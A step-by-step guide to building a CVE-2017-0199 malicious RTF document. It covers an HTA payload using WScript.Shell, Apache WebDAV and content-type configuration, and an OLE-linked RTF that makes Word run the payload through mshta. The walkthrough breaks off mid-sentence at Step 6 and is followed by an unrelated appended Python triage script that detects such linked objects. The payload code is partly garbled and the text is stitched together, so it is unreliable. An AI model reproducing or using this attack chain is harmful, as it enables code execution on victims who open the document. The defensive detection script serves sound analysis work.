CVE-2017-0199 Malicious RTF Document

Step 1

Prepare an HTA file (an HTA file is an HTML Application, which can run JScript and VBScript). Let's call it "ms.hta":

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
    <html xmlns="">
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    a=new ActiveXObject("WScript.Shell");'chrome',0);
    <object type="text/html" data="" width="100%" height="100%">

Step 2

Create a simple RTF document using Winword with any random content (in our example the string "This is my official and legit content").

Call it "ms.rtf"

Step 3

Push these 2 files to a web server you have full control over. We assume they will be stored under /var/www/html.

Now we have to configure Apache so that ms.rtf can be included as a link (Office fetches linked objects over WebDAV):

    a2enmod dav
    a2enmod dav_fs
    a2enmod dav_lock
    a2enmod headers
    service apache2 restart

The following directives will:
 - add "Content-Type: application/rtf" to all files served from /ms
 - allow the PROPFIND request performed by Microsoft Office

Modify virtualhost and include:

    <Directory /var/www/html/ms/>
        Header set Content-Type "application/rtf"
    </Directory>
    <Directory />
        Dav On
    </Directory>

    service apache2 restart

Step 4

Create a simple RTF document using Winword and call it "exploit.rtf". This will be our exploit!

Insert -> Object


After clicking OK you will get the content of the "ms.rtf" file, which just contains a random string.

Save the file as "exploit.rtf"

Step 5

The following step will:
 - replace the ms.rtf that we have included with the custom HTA payload
 - make the web server send an "application/hta" content-type: the Winword client interprets this and runs mshta to handle the content-type, which executes our payload

    cat /var/www/html/ms/ms.hta > /var/www/html/ms/ms.rtf
    vi /etc/apache2/sites-enabled/000-default

Change application/rtf to application/hta:

    <Directory /var/www/html/ms/>
        Header set Content-Type "application/hta"
    </Directory>

    service apache2 restart

Step 6

At this step, if the user opens the "exploit.rtf" file, he still has to double-click the linked object to launch the attack.

If we want the OLE object to be loaded automatically when the document is opened, we have to edit the exploit.rtf file and change:
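From the defender's side, an added triage example (not part of this write-up): a small Python script that walks the \object groups of an RTF file, reports whether each object is linked rather than embedded (\objautlink, the RTF control word for a linked OLE object) and whether it is marked to refresh when the document is opened (\objupdate), and pulls the link target out of the hex \objdata blob, where the OLE URL moniker stores it as a UTF-16LE string. The sample RTF is constructed inline and example.invalid is a placeholder host.

```python
"""Triage linked OLE objects in RTF files (added example, not from the original write-up)."""
import re

# Constructed sample, not a real malicious file: one linked, auto-updating object
# whose \objdata carries a URL as UTF-16LE, plus one ordinary embedded object.
SAMPLE_URL = "http://example.invalid/ms/ms.rtf"
SAMPLE_RTF = (
    r"{\rtf1\ansi "
    r"{\object\objautlink\objupdate\objw100\objh100{\*\objdata "
    + SAMPLE_URL.encode("utf-16-le").hex() + "}}"
    r"{\object\objemb{\*\objdata 0105000002000000}}"
    "}"
)

OBJECT_RE = re.compile(r"\\object\b")
OBJDATA_RE = re.compile(r"\\\*\\objdata\s*([0-9a-fA-F\s]+)")
URL_RE = re.compile(rb"[a-z]+://[^\x00-\x1f\s]+", re.IGNORECASE)


def _group_from(text, open_idx):
    """Return the {...} group that starts at open_idx (brace matching)."""
    depth = 0
    for i in range(open_idx, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[open_idx:i + 1]
    return text[open_idx:]  # unterminated group: take the rest of the file


def scan_rtf(rtf):
    """One finding per \\object group: link/update flags and any URL in \\objdata."""
    findings = []
    for m in OBJECT_RE.finditer(rtf):
        group = _group_from(rtf, rtf.rfind("{", 0, m.start()))
        data = OBJDATA_RE.search(group)
        raw = bytes.fromhex("".join(data.group(1).split())) if data else b""
        # The moniker stores the target as a wide string; drop the NULs so a byte regex sees it.
        urls = [u.decode("ascii", "replace") for u in URL_RE.findall(raw.replace(b"\x00", b""))]
        linked, auto_update = "\\objautlink" in group, "\\objupdate" in group
        findings.append({"linked": linked, "auto_update": auto_update, "urls": urls,
                         "suspicious": linked and auto_update and bool(urls)})
    return findings


if __name__ == "__main__":
    for n, f in enumerate(scan_rtf(SAMPLE_RTF)):
        print(f"object {n}: {f}")
```

Running it over a real document means reading the file as text with errors="replace" first; an object that is linked, set to update on open and points at a remote URL is the combination worth pulling for analysis.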